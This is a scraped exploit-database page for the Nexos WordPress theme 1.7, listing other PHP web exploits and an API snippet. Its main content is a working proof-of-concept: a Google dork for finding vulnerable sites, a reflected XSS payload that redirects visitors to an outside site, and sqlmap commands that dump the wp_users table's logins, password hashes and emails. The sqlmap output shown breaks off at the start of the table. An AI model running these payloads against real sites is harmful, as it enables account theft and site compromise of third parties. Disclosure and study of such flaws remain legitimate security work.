Search for hundreds of thousands of exploits

"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection"

Author

Exploit author

"Vlad Vector"

Platform

Exploit platform

php

Release date

Exploit published date

2020-07-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
# Google Dork: inurl:/wp-content/themes/nexos/
# Date: 2020-06-17
# Exploit Author: Vlad Vector
# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
# Software Version: 1.7
# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
# Tested on: Debian 10
# CVE: CVE-2020-15363, CVE-2020-15364
# CWE: CWE-79, CWE-89



### [ Info: ]

[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS
[x] SQL Injection



### [ PoC Unauthenticated Reflected XSS: ]

[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΞ›DVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>

[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
Host: listing-themes.com



### [ PoC SQL Injection: ]

[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4

[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] geniuscr_nexos
[*] information_schema

[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8

Database: TARGET-DB
Table: wp_users
[9 entries]
+--------------+------------------------------------+-------------------------+
Release DateTitleTypePlatformAuthor
2020-09-18"Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)"webappsphp"Nikolas Geiselman"
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"BloodX CMS 1.0 - Authentication Bypass"webappsphpBKpatron
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
Release DateTitleTypePlatformAuthor
2020-07-22"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection"webappsphp"Vlad Vector"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48682/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.